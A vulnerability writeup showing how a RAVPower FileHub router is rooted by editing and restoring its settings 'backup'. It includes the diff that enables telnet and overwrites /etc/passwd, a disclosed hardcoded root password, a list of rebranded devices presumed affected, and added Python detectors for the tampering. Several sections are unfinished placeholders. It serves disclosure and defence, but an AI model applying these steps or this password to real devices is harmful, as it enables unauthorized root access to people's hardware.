if this looks familiar.. it's because it is - this particular model/firmware combination is running a very similar 'firmware' to the [HooToo](hootoo) devices.
however, as noted in the upgrade saga there, none of these devices are _exactly_ the same.
### nmap
initially, we see:
```
PORT STATE SERVICE VERSION
80/tcp open http lighttpd
81/tcp open http Web-Based Enterprise Management CIM serverOpenPegasus WBEM httpd
85/tcp open tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
like the HooToo, running 2 webservers on `80` and `81` and 'something' on `85`. when we plug a drive in, the NAS/NFS functionality lights up a few more ports:
```
TODO add this
```
### 'backup'
while looking through the web UI and comparing it to the HooToo, i noticed a 'Backup Settings' option.
[http://device/sysfirm.csp?fname=sysbackupform&t=timestamp](http://10.10.10.254:81/sysfirm.csp?fname=sysbackupform&t=1467949779552) downloads a file:
assuming that this was probably the same underlying system as the HooToo, there should be some concept of `telnetd`. searching the file turned up code that appeared to be `/etc/rc.d` load scripts:
```shell
#Modify for 3G reset not Open
if [ ! -f /etc/checktelnetflag ]; then
telnetd &
elif [ -f /etc/telnetflag ]; then
telnetd &
fi
```
my first attempt was to modify the file to just include a blind run of `telnetd &`:
this started telnet (after restoring the file through the same web UI used to back up the original)!
```
TODO fill in initial admin login here
```
using the same password for `admin` that is used in the web UI, i was able to login.
i looked, and again, `/etc/passwd` and `/etc/shadow` were world readable. i took the contents to my trusty GCE v16 instance, and.. cracked the root password immediately.
yep, using the same root password as the HooToo devices here too: `20080826`
however, the `/etc/passwd` contents were not the same:
`root` has a login shell of `/sbin/nologin` - so even though we know the password, because this firmware doesn't have `sudo`, we can't get root access directly.
i changed tactics, and decided to just create the flagfile `/etc/telnetflag`, assuming it was some dev trigger, especially after seeing:
```shell
if [ -f /etc/telnetflag ]; then
sed -i "s|:/root:/sbin/nologin|:/root:/bin/sh|" /etc/passwd
#cp -f /etc/telnetpasswd /etc/passwd
#cp -f /etc/telnetshadow /etc/shadow
fi
```
aha! so not only will that file start `telnetd`, but it will also let us login. so, modify the 'backup' to just create that file instead:
except.. after we restore this 'backup', we still can't login:
```
TODO add this
```
looking deeper, while the code had executed (`telnetd` was still running after all), it appears that the change for `/bin/sh` was applied to `/etc/telnetpasswd`, not `/etc/passwd`.
i uncommented the lines that copied one to the other, giving:
```
$ diff fw_120101.bin.gz fw_rooted.bin.gz --text
1683a1684
> touch /etc/telnetflag
2211,2212c2212,2213
<#cp-f/etc/telnetpasswd/etc/passwd
<#cp-f/etc/telnetshadow/etc/shadow
---
> cp -f /etc/telnetpasswd /etc/passwd
> cp -f /etc/telnetshadow /etc/shadow
3986,3987c3987,3988
< # cp -f /etc/telnetpasswd /etc/passwd
< # cp -f /etc/telnetshadow /etc/shadow
---
> cp -f /etc/telnetpasswd /etc/passwd
> cp -f /etc/telnetshadow /etc/shadow
```
and after applying, got to:
```
WD02 login: root
Password:
login: can't chdir to home directory '/root'
#
```
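the three edits in the diff above (create `/etc/telnetflag`, uncomment the two `cp -f /etc/telnet*` copies) are exactly what a defender would want to catch in a settings 'backup' before it gets restored. the following Python check is an added example, not code from the original writeup: it parses normal-format `diff` output (the `1683a1684` / `2211,2212c2212,2213` style shown above) into hunks and flags added lines that create the flag file, overwrite `/etc/passwd` or `/etc/shadow` from the telnet copies, or start `telnetd`; a second function scans a whole backup blob when there is no pristine copy to diff against. the sample diff is the one above with the spaces `diff` prints after `<` and `>` restored, and the stock script snippet is constructed from the excerpts in this post.

```python
"""Audit a settings 'backup' (a shell-script blob) for changes that turn on
telnet on HooToo/RAVPower-style firmware.

Added example, not code from the original writeup.
  * parse_normal_diff(): parses `diff` normal-format output into hunks;
  * audit_diff() / audit_script(): flag lines that create /etc/telnetflag,
    copy /etc/telnetpasswd and /etc/telnetshadow over /etc/passwd and
    /etc/shadow, or add a telnetd start.
"""
import re

# Normal diff change command: e.g. 1683a1684, 2211,2212c2212,2213, 5d4
HUNK_RE = re.compile(r"^(\d+)(?:,(\d+))?([acd])(\d+)(?:,(\d+))?$")

# (pattern, reason) pairs applied to shell lines that are not comments.
FLAG_PATTERNS = [
    (re.compile(r"^touch\s+/etc/telnetflag\b"),
     "creates the /etc/telnetflag dev trigger"),
    (re.compile(r"^cp\s+-f\s+/etc/telnet(passwd|shadow)\s+/etc/(passwd|shadow)\b"),
     "overwrites /etc/passwd or /etc/shadow from the telnet* copies"),
]
# Only meaningful for lines *added* by a diff: the stock script starts telnetd
# too, but only behind the flag-file checks, so a newly added start is suspect.
ADDED_ONLY_PATTERNS = [
    (re.compile(r"^telnetd\b"), "adds a telnetd start"),
]


def parse_normal_diff(text):
    """Return hunks {cmd, op, old, new} from normal diff output.
    Lines before the first change command (e.g. the shell prompt line) are ignored."""
    hunks, cur = [], None
    for line in text.splitlines():
        m = HUNK_RE.match(line)
        if m:
            cur = {"cmd": line, "op": m.group(3), "old": [], "new": []}
            hunks.append(cur)
        elif cur is None or line == "---":
            continue
        elif line.startswith("< "):
            cur["old"].append(line[2:])
        elif line.startswith("> "):
            cur["new"].append(line[2:])
    return hunks


def classify(line, added=False):
    """Return the reason a shell line is suspicious, or None. Comments are ignored."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    patterns = FLAG_PATTERNS + (ADDED_ONLY_PATTERNS if added else [])
    for pat, reason in patterns:
        if pat.search(stripped):
            return reason
    return None


def audit_diff(diff_text):
    """Findings for lines a diff adds: list of (change command, line, reason)."""
    findings = []
    for hunk in parse_normal_diff(diff_text):
        for line in hunk["new"]:
            reason = classify(line, added=True)
            if reason:
                findings.append((hunk["cmd"], line, reason))
    return findings


def audit_script(script_text):
    """Findings for a whole backup blob when no pristine copy is available: (lineno, line, reason)."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        reason = classify(line)
        if reason:
            findings.append((lineno, line.strip(), reason))
    return findings


# Constructed sample: the post's diff with the spaces after '<' and '>' restored.
SAMPLE_DIFF = """$ diff fw_120101.bin.gz fw_rooted.bin.gz --text
1683a1684
> touch /etc/telnetflag
2211,2212c2212,2213
< #cp -f /etc/telnetpasswd /etc/passwd
< #cp -f /etc/telnetshadow /etc/shadow
---
> cp -f /etc/telnetpasswd /etc/passwd
> cp -f /etc/telnetshadow /etc/shadow
3986,3987c3987,3988
< # cp -f /etc/telnetpasswd /etc/passwd
< # cp -f /etc/telnetshadow /etc/shadow
---
> cp -f /etc/telnetpasswd /etc/passwd
> cp -f /etc/telnetshadow /etc/shadow
"""

# Constructed sample: the stock snippets from the post, which should produce no findings.
STOCK_SNIPPET = """#Modify for 3G reset not Open
if [ ! -f /etc/checktelnetflag ]; then
telnetd &
elif [ -f /etc/telnetflag ]; then
telnetd &
fi
if [ -f /etc/telnetflag ]; then
sed -i "s|:/root:/sbin/nologin|:/root:/bin/sh|" /etc/passwd
#cp -f /etc/telnetpasswd /etc/passwd
#cp -f /etc/telnetshadow /etc/shadow
fi
"""

if __name__ == "__main__":
    for cmd, line, reason in audit_diff(SAMPLE_DIFF):
        print(f"{cmd}: {line!r}: {reason}")
    print("stock snippet findings:", audit_script(STOCK_SNIPPET))
```

`audit_diff` reports five findings for the sample (the `touch` plus the four uncommented `cp -f` lines), and `audit_script` reports nothing for the stock snippet because the conditional `telnetd &` starts and the commented-out copies are the shipped state; the same scan over a tampered blob reports the added lines with their line numbers.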
## other affected devices
while looking for `*.js` files used, i found the obviously interesting `config.js`. i was expecting configuration of the device, but what i found was the more obvious, configuration for the device:
```javascript
//泽宝RAV
var WD01 = {title:"RAVPower FileHub",services: ["win:Service_Win","skip:Service_SKIP"], language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"WD01",icons:"WD01_",hasRJ45:false};
var WD02 = {title:"RAV FileHub", language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",hasPPPoE:true,theme:"WD02",icons:"WD02_",hasRJ45:true,services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"]};
//HooToo
var TM01 = {language:["us","zh_CN","tr_CN"],title:"TripMate",theme:"TM01",hasWiFiMHZ:true,hasHideSSID:true,hasRJ45:true,hasPPPoE:true,helphtml: "help/{#lge}.html",icons:"TM01_",services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],network: ["host:Setting_HostName", "wifi:Setting_Network_WiFiLAN", "dhcp:Setting_Network_DHCPServer", "internet:Setting_Network_Internet"]};
var TM02 = {title:"TripMate Nano", services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"TM02",icons:"TM02_",hasPPPoE:true};
var TM03 = {title:"TripMate Mini",services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"TM03",icons:"TM04_",hasPPPoE:true};
var TM04 = {title:"TripMate Elite",services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"TM04",icons:"TM04_",hasPPPoE:true};
```
given this, i think it's fair to assume that all of these devices listed [below](#complete-device-list) are equally vulnerable.
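because every rebrand is one `var MODEL = {...};` line under a `//Vendor` comment, the list of affected models can be pulled out of `config.js` mechanically. the parser below is an added example, not code from the original writeup or the firmware: it extracts vendor, title, theme, `hasRJ45` and the language list per model with regular expressions (no JavaScript engine needed) and groups the models by vendor, which is what an asset inventory needs. the sample `config.js` text is the excerpt shown above, constructed inline.

```python
"""Pull a device inventory out of the firmware's config.js.

Added example, not code from the original writeup. Parses lines of the form
    //Vendor
    var MODEL = {title:"...", theme:"...", hasRJ45:false, language:[...], ...};
with regular expressions and groups the models by vendor.
"""
import re

VAR_RE = re.compile(r"^\s*var\s+(\w+)\s*=\s*\{(.*)\}\s*;?\s*$")
STR_FIELD_RE = r'\b{key}\s*:\s*"([^"]*)"'
BOOL_FIELD_RE = r"\b{key}\s*:\s*(true|false)\b"
LANG_RE = re.compile(r"\blanguage\s*:\s*\[([^\]]*)\]")


def _str_field(body, key):
    """String-valued key inside one object literal body, or None if absent."""
    m = re.search(STR_FIELD_RE.format(key=key), body)
    return m.group(1) if m else None


def _bool_field(body, key):
    """Boolean key inside one object literal body; None when the key is absent."""
    m = re.search(BOOL_FIELD_RE.format(key=key), body)
    return None if m is None else m.group(1) == "true"


def parse_config_js(text):
    """Return {model: {vendor, title, theme, hasRJ45, languages}} for every var line.
    The most recent `//` comment is taken as the vendor of the lines that follow it."""
    models, vendor = {}, None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("//"):
            vendor = stripped[2:].strip()
            continue
        m = VAR_RE.match(line)
        if not m:
            continue
        name, body = m.group(1), m.group(2)
        langs = LANG_RE.search(body)
        models[name] = {
            "vendor": vendor,
            "title": _str_field(body, "title"),
            "theme": _str_field(body, "theme"),
            "hasRJ45": _bool_field(body, "hasRJ45"),
            "languages": re.findall(r'"([^"]*)"', langs.group(1)) if langs else [],
        }
    return models


def by_vendor(models):
    """Group 'MODEL (title)' strings under their vendor comment, in file order."""
    grouped = {}
    for name, info in models.items():
        grouped.setdefault(info["vendor"], []).append(f"{name} ({info['title']})")
    return grouped


# Constructed sample: the config.js excerpt quoted in the post.
SAMPLE_CONFIG_JS = """//泽宝RAV
var WD01 = {title:"RAVPower FileHub",services: ["win:Service_Win","skip:Service_SKIP"], language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"WD01",icons:"WD01_",hasRJ45:false};
var WD02 = {title:"RAV FileHub", language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",hasPPPoE:true,theme:"WD02",icons:"WD02_",hasRJ45:true,services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"]};
//HooToo
var TM01 = {language:["us","zh_CN","tr_CN"],title:"TripMate",theme:"TM01",hasWiFiMHZ:true,hasHideSSID:true,hasRJ45:true,hasPPPoE:true,helphtml: "help/{#lge}.html",icons:"TM01_",services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],network: ["host:Setting_HostName", "wifi:Setting_Network_WiFiLAN", "dhcp:Setting_Network_DHCPServer", "internet:Setting_Network_Internet"]};
var TM02 = {title:"TripMate Nano", services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"TM02",icons:"TM02_",hasPPPoE:true};
var TM03 = {title:"TripMate Mini",services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"TM03",icons:"TM04_",hasPPPoE:true};
var TM04 = {title:"TripMate Elite",services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"TM04",icons:"TM04_",hasPPPoE:true};
"""

if __name__ == "__main__":
    for vendor, names in by_vendor(parse_config_js(SAMPLE_CONFIG_JS)).items():
        print(f"{vendor}: {', '.join(names)}")
```

running it over the full `config.js` from the device gives the vendor-by-vendor table; models without a `hasRJ45` key come back as `None` rather than `False`, so the absence of the key is distinguishable from an explicit `false`.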
## 'backup' strikes again
kicking myself for missing the 'backup' vector when looking at the HooToo devices, i took another look - and no, there was no 'Backup / Restore Settings' option in the web UI.
remembering that a lot of the HooToo functionality lived behind `*.csp` `GET`s, it seemed reasonable that the backup method for the RAV-FileHub would also work for the HooToo devices. it [does](TODO add this writeup to the hootoo side so we can link to it from here).
## complete device list
```javascript
var WMC_i22 = {language:["us","zh_CN","tr_CN","ja_JP","de_DE","ko_KO","ru_RU","fr_FR","pu_PU","sp_SP","du_DU","it_IT"],theme:"WMC_i22",title:"FP-WiFi Disk",hasRJ45:false};
var WMC_i21 = {language:["us","zh_CN","tr_CN","ja_JP","de_DE","ko_KO","ru_RU","fr_FR","pu_PU","sp_SP","du_DU","it_IT"],theme:"WMC_i21",title:"FP-WiFi Disk",hasRJ45:true};
//Lenovo
var LeDisk= {language:["us","zh_CN","tr_CN"],theme:"LeDisk",title:"Lenovo WiFi Disk",hasRJ45:true,hasPPPoE: true,hotPlug: false,services: ["win:Service_Win","dlna:Service_DLNA"],helphtml: "help/{#lge}.html"};
//I-O DATA
var WFSSR01 = {language:["ja_JP"], theme:"WFSSR01", title:"WFS-SR01",helphtml: "help/{#lge}.html"};
var WFSCSR01 = {language:["tr_CN","zh_CN","us","ja_JP"],title:"WFS-CSR01",theme:"WFSCSR01",helphtml: "help/{#lge}.html"};
//Maxwave
var EZCH31 = {language:["us"], theme:"EZCH31", title:"WiFi Disk"};
//PEARL
var PX4854 = {language:["de_DE","fr_FR","us"], theme:"PX4854", title:"7links WLAN-Speicheradapter",hasRJ45:false,helphtml: "help/{#lge}.html",firmwareUrl: "http://www.pearl.de"};
var PX4893 = {language:["de_DE","fr_FR","us"], theme:"PX4893", title:"7links WLAN-Speicheradapter",hasRJ45:false,helphtml: "help/{#lge}.html",firmwareUrl: "http://www.pearl.de"};
var WHL220M = {language:["us","ru_RU"] ,hotPlug:false,theme:"WHL220M",title:"3Q WiFi Disk Manager",helphtml: "help/{#lge}.html",firmwareUrl: "www.3Q-int.com"}
//MEDION
var WLAN_HDD_N_GO = { language: ["us","fr_FR","de_DE","du_DU","pu_PU","sp_SP","it_IT","dk_DK"], theme: "WLAN_HDD_N_GO", title: "WLAN HDD N GO",hasRJ45: false,icons:"WLAN_HDD_N_GO_",network: ["host:Setting_HostName", "wifi:Setting_Network_WiFiLAN", "dhcp:Setting_Network_DHCPServer", "internet:Setting_Network_Internet"]}
var iAirDisk = {title:"Air Disk", language:["tr_CN","zh_CN","us"],hasPPPoE: true, theme:"iAirDisk"};
//Sarotech
var WFABU2 = {title:"Sarotech WiDisk", language:["us","zh_CN","tr_CN","ko_KO"], theme:"WFABU2"};
//Valence
var MicroSD = {title:"Valence iCloud", language:["tr_CN","zh_CN","us"],hasPPPoE: true, theme:"MicroSD"};
//泽宝RAV
var WD01 = {title:"RAVPower FileHub",services: ["win:Service_Win","skip:Service_SKIP"], language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"WD01",icons:"WD01_",hasRJ45:false};
var WD02 = {title:"RAV FileHub", language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",hasPPPoE:true,theme:"WD02",icons:"WD02_",hasRJ45:true,services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"]};
//HooToo
var TM01 = {language:["us","zh_CN","tr_CN"],title:"TripMate",theme:"TM01",hasWiFiMHZ:true,hasHideSSID:true,hasRJ45:true,hasPPPoE:true,helphtml: "help/{#lge}.html",icons:"TM01_",services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],network: ["host:Setting_HostName", "wifi:Setting_Network_WiFiLAN", "dhcp:Setting_Network_DHCPServer", "internet:Setting_Network_Internet"]};
var TM02 = {title:"TripMate Nano", services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"TM02",icons:"TM02_",hasPPPoE:true};
var TM03 = {title:"TripMate Mini",services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"TM03",icons:"TM04_",hasPPPoE:true};
var TM04 = {title:"TripMate Elite",services: ["win:Service_Win","dlna:Service_DLNA","skip:Service_SKIP"],language:["zh_CN","tr_CN","us","fr_FR","de_DE","sp_SP","it_IT"],helphtml: "help/{#lge}.html",theme:"TM04",icons:"TM04_",hasPPPoE:true};
//Choton 中创
var WiCloud = {title:"WiCloud",language:["zh_CN","tr_CN","us","fr_FR","de_DE","ko_KO","pu_PU","du_DU","sp_SP","it_IT"],network: ["host:Setting_HostName", "wifi:Setting_Network_WiFiLAN", "dhcp:Setting_Network_DHCPServer", "internet:Setting_Network_Internet"],services: ["win:Service_Win","dlna:Service_DLNA"],theme:"WiCloud",hasPPPoE:true};
//DAHENG 大恒
var DH_3000WIFI = {theme:"DH_3000WIFI",title:"DAHENG WIFI",language:["zh_CN","tr_CN","us","fr_FR","de_DE","ko_KO","sp_SP","it_IT"],services: ["win:Service_Win","dlna:Service_DLNA"],hasPPPoE:true,has3G:true};
//PNY
var PNYMediaReader = {theme:"PNYMediaReader",title:"PNY Wireless Media Reader",language:["us","zh_CN","tr_CN","fr_FR","de_DE","ru_RU","pu_PU","sp_SP","du_DU","it_IT"],services: ["win:Service_Win","dlna:Service_DLNA"],hasRJ45: false};
//Merlin Digital 的 WifiHDD
var WifiStorage = {theme:"WifiStorage",title:"WiFi Disk",language:["us"],hotPlug:false,hasPPPoE:true};
```